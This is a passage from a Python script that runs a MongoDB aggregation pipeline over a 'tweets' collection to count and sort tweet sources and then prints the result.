    }, {
        "$sort": {
            "count": -1
        }
    }]

    return pipeline


def tweet_sources(db, pipeline):
    result = db.tweets.aggregate(pipeline)
    return result


if __name__ == '__main__':
    db = get_db('twitter')
    pipeline = make_pipeline()
    result = tweet_sources(db, pipeline)
    import pprint
    pprint.pprint(result)